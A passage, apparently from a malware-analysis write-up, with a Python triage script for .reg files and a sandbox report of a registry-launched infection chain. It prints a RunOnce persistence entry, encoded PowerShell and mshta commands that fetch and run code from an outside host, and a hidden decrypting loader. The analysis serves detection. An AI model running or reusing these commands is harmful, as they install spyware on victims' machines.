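    "[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce]\r\n"
    '"MegaLIMLauncher"="pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA"\r\n\r\n'
    "[HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    '"Demo"=hex(2):63,00,61,00,6c,00,63,00,\\\r\n'
    "  2e,00,65,00,78,00,65,00,00,00\r\n\r\n"
    "[HKEY_CURRENT_USER\\SOFTWARE\\Harmless]\r\n"
    '"Flags"=dword:00000001\r\n'
)
# regedit exports "Version 5.00" files as UTF-16LE with a byte-order mark.
SAMPLE_REG_BYTES = b"\xff\xfe" + SAMPLE_REG.encode("utf-16-le")

AUTOSTART = re.compile(r"\\CurrentVersion\\(Run|RunOnce|RunServices|RunServicesOnce)$", re.I)
# -e / -ec / -enc / -encodedcommand (any prefix, case-insensitive) followed by base64
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def load_reg_text(data: bytes) -> str:
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    return data.decode("utf-8", errors="replace")  # REGEDIT4-style ANSI files


def _unescape(s: str) -> str:
    return s.replace('\\"', '"').replace("\\\\", "\\")


def _decode_value(raw: str) -> str:
    low = raw.lower()
    if raw.startswith('"') and raw.endswith('"'):
        return _unescape(raw[1:-1])
    if low.startswith("dword:"):
        return str(int(raw[6:], 16))
    if low.startswith("hex(2):") or low.startswith("hex(7):"):  # REG_EXPAND_SZ / REG_MULTI_SZ
        blob = bytes.fromhex(raw.split(":", 1)[1].replace(",", ""))
        return blob.decode("utf-16-le").rstrip("\x00")
    return raw  # other hex(...) types are kept as their raw text


def parse_reg(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal .reg parser: [Key] sections, "name"=value lines, hex continuations."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    lines = text.replace("\r\n", "\n").split("\n")
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line and not line.startswith(";"):
            while line.endswith("\\") and i + 1 < len(lines):  # hex continuation lines
                i += 1
                line = line[:-1] + lines[i].strip()
            name, _, raw = line.partition("=")
            name = "(Default)" if name == "@" else _unescape(name.strip('"'))
            keys[current][name] = _decode_value(raw.strip())
        i += 1
    return keys


@dataclass
class Finding:
    key: str
    value: str
    data: str
    severity: str
    decoded: Optional[str] = None


def triage(data: bytes) -> List[Finding]:
    """Report every value under an autostart key; PowerShell with an encoded command
    is decoded (base64 -> UTF-16LE, as -EncodedCommand expects) and rated high."""
    findings: List[Finding] = []
    for key, values in parse_reg(load_reg_text(data)).items():
        if not AUTOSTART.search(key):
            continue
        for name, val in values.items():
            f = Finding(key, name, val, "medium")
            m = ENC_FLAG.search(val) if re.search(r"powershell|pwsh", val, re.I) else None
            if m:
                f.severity = "high"
                try:
                    f.decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
                except (ValueError, UnicodeDecodeError):
                    f.decoded = None  # encoded flag present but payload unreadable
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_REG_BYTES):
        print(f"[{f.severity}] {f.key}\\{f.value} = {f.data!r}")
        if f.decoded:
            print("    decoded:", f.decoded)
```

Matching the process name and the flag case-insensitively matters here: the value is written as pOwErsHELl and the flag as -eNC precisely to slip past exact-string rules, which is also why the Sigma rule above keys on the decoded base64 offsets rather than on the literal text.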
      No Snort rule has matched

Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2263967189.000001FD64F86000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211852416.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2195911293.000001CAD88ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 
0000000C.00000002.2209666982.000001C2D4234000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2187081636.000001CAD6447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1960856139.000001CAD643C000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
      Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000003.00000003.2248732178.0000020567AD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2250278393.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254394893.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248649818.000002056BAF4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254566671.0000020567B52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248042575.000001FD6503C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2254039298.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2248857191.000002056BAC7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2247357184.0000020567B50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211213841.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211406536.000001CAD6432000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191443291.000001C2D42F6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2194671358.000001CAD63CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.1961414659.000001CAD6439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191117905.000001CAD63B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2191355174.000001CAD63BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2188728920.000001C2D42DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.2190912701.000001CAD63CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 
0000000C.00000003.2194511567.000001CAD63BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.2211271395.000001CAD63EF000.00000004.00000020.00020000.00000000.sdmp, DonaldDuck[1].3.dr
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA187
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DE180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DE180
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_001EA2E4
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EA66E FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_001EA66E
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E686D FindFirstFileW,FindNextFileW,FindClose,15_2_001E686D
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DE9BA GetFileAttributesW,FindFirstFileW,FindClose,15_2_001DE9BA
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E74F0 FindFirstFileW,FindClose,15_2_001E74F0
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001E7591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,15_2_001E7591
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DDE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_001DDE32
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CAE75 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,15_2_015CAE75
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CD545 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,15_2_015CD545
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015CD64D FindFirstFileA,GetLastError,15_2_015CD64D
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155A20D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,16_2_0155A20D
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155C9E5 FindFirstFileA,GetLastError,16_2_0155C9E5
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_0155C8DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,16_2_0155C8DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: global traffic | HTTP traffic detected:
    GET /webdav/reg/DesolateOxidant.zip HTTP/1.1
    Host: pwsh2.pajamas-stoic-failing.lol
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected:
    GET /webdav/reg/DonaldDuck HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: pwsh2.pajamas-stoic-failing.lol
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001ED935 InternetReadFile,SetEvent,GetLastError,SetEvent,15_2_001ED935
Source: global traffic | HTTP traffic detected:
    GET /webdav/reg/DonaldDuck HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: pwsh2.pajamas-stoic-failing.lol
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /webdav/reg/DesolateOxidant.zip HTTP/1.1
    Host: pwsh2.pajamas-stoic-failing.lol
    Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: pwsh2.pajamas-stoic-failing.lol
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EF664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001EF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DAA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_00209FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015DF241 CreateDesktopA,CreateProcessA,CreateProcessA,CreateProcessA,CreateProcessA,WaitForSingleObject

      System Summary

      Source: amsi64_7436.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
      Source: amsi64_7956.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\AutoIt3.exe
      Source: unknown | Process created: C:\Windows\regedit.exe "regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
      Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 3225
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_015E26C9 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 16_2_01571A61 GetCurrentProcessId,CreateProcessA,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,ResumeThread,Sleep,GetTickCount
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DE3CB CreateFileW,DeviceIoControl,CloseHandle
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001D230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exe | Code function: 15_2_001DF76E ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
      Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_0017DC7015_2_0017DC70
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_001A9D1E15_2_001A9D1E
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_00191FC115_2_00191FC1
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E201A15_2_015E201A
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 15_2_015E202115_2_015E2021
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B216_2_015713B2
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_015713B916_2_015713B9
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: 16_2_0156149F16_2_0156149F
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\AutoIt3.exe 1DA298CAB4D537B0B7B5DABF09BFF6A212B9E45731E0CC772F99026005FB9E48
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0019014F appears 40 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0019488E appears 34 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 00191000 appears 41 times
      Source: C:\Users\user\AppData\Roaming\AutoIt3.exeCode function: String function: 0017FA3B appears 33 times
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: amsi64_7436.amsi.csv, type: OTHER; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_7956.amsi.csv, type: OTHER; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7436, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7956, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine; Classification label: mal100.spyw.evad.winREG@20/25@1/2
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001E4573 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001D21C9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001D27D9 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001E5D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001DE2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001D8056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Code function: 15_2_001E3DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\mshta.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7448:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlrxjdq2.zt2.ps1
Source: C:\Users\user\AppData\Roaming\AutoIt3.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\regedit.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Windows\regedit.exe "regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
Source: C:\Windows\System32\mshta.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac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kCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D79435557754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\AutoIt3.exe "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
